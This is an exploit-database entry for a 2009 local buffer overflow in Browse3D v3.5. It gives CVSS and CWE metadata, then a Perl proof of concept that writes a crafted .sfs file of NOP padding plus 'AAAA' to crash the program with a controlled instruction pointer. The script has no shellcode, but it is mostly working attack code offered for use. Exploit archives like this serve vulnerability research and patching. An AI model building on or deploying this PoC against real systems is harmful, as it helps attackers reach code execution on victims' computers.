Browse3D v3.5 (.sfs) File Local Buffer overflow PoC

vendor:

Browse3D

by:

Houssamix

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Browse3D

Affected Version From: 3.5

Affected Version To: 3.5

Patch Exists: Yes

Related CWE: N/A

CPE: a:browse3d:browse3d

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Browse3D v3.5 (.sfs) File Local Buffer overflow PoC

Browse3D v3.5 is vulnerable to a local buffer overflow vulnerability. An attacker can create a specially crafted .sfs file, containing a malicious payload, which when opened with Browse3D v3.5, can cause a buffer overflow, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Browse3D v3.5 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# -- Viva Gazza -- Viva Palestine --

# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe

# Author : Houssamix

# create file exploit > open it > 
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.

# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !

print "===================================================================== \n";
print "Author : Houssamix 						    \n";
print "===================================================================== \n";
print "Browse3D v3.5 Local Buffer overflow PoC				  \n";
print "===================================================================== \n";

my $adresse = "AAAA" ; 
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it  with Browse3D v 3.5\n";

# milw0rm.com [2009-01-11]